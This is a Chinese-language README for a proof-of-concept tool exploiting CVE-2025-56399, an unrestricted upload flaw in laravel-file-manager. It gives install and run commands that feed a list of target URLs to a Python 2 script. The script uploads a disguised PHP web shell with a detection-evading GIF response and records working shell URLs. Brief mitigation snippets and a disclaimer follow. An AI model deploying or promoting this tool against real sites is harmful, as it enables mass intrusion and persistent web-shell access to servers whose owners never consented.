CWE-434:危险类型文件无限制上传
CVSS 评分:8.5(高危)
本工具提供了 CVE-2025-56399 的概念验证(PoC),这是一个存在于 alexusmai/laravel-file-manager(版本 ≤ 3.3.1)中的严重漏洞。
该漏洞允许 经过身份验证的攻击者 通过上传精心构造的文件、绕过客户端验证并将其重命名为 PHP 扩展名,从而实现 远程代码执行(RCE)。
此脚本自动化了整个流程:
| 属性 | 值 |
|---|---|
| 漏洞类型 | 无限制文件上传 → RCE |
| CWE | CWE-434 |
| CVSS 评分 | 8.5(高危) |
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 低(已认证) |
| 用户交互 | 主动 |
/file-manager).png 文件.phpgit clone https://github.com/Jenderal92/laravel-filemanager-unrestricted-upload.git
cd laravel-filemanager-unrestricted-upload
pip install -r requirements.txt
依赖项
· Python 2.7 · requests · colorama
📖 使用
python2 lfm.py list.txt
输入格式 (list.txt)
https://target1.com
https://target2.com
http://target3.com
输出
· valid.txt – 已验证的 shell URL 列表(添加 ?shinday=1 进行访问)
示例输出:
https://target.com/storage/shxt_123456.php?shinday=1
🧪 漏洞利用原理
<meta name="csrf-token"> 或 _token 输入字段中提取令牌。/file-manager/initialize 获取磁盘配置。.htaccess(用于绕过限制),然后上传载荷(shxt_<timestamp>.php)并附带 GIF MIME 类型。?shinday=1 是否返回字符串 "Shinday";如果是,则 shell 有效并保存到 valid.txt。📂 载荷详情
上传的 PHP 文件是一个单文件 web shell,具有以下功能:
· 显示系统信息(php_uname)
· 提供文件上传表单(用于添加更多工具)
· 响应参数 ?shinday=1,显示完整的 shell 界面
· 否则输出有效的 GIF89a 图像以避免检测
通过以下方式访问 shell:
https://target.com/path/to/shxt_123456.php?shinday=1
🛡️ 缓解措施
为防止此漏洞:
Route::group(['middleware' => ['auth', 'admin']], function () {
// File Manager 路由
});
composer remove alexusmai/laravel-file-manager
<FilesMatch "\.(php|phtml|php3|php4|php5|phar)$">
Deny from all
</FilesMatch>
📦 受影响版本
| 包 | 受影响版本 |
|---|---|
| alexusmai/laravel-file-manager | ≤ 3.3.1 |
🔗 参考链接
· CVE-2025-56399 - NVD · GitHub 安全公告 · Snyk 漏洞数据库 · VulDB 条目 · alexusmai/laravel-file-manager
📜 免责声明
警告: 本工具仅用于教育和授权的安全测试。 使用本工具即表示您同意:
· 仅测试您拥有或已获明确许可的系统 · 不得用于恶意目的 · 遵守所有适用法律
作者不对任何滥用或造成的损害承担责任。
更多免责声明请参见 Jenderal92 的封面。您可点击 此处查看